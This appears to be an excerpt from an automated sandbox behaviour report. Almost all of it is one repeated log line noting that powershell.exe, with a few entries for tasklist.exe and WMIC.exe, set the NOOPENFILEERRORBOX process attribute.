              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
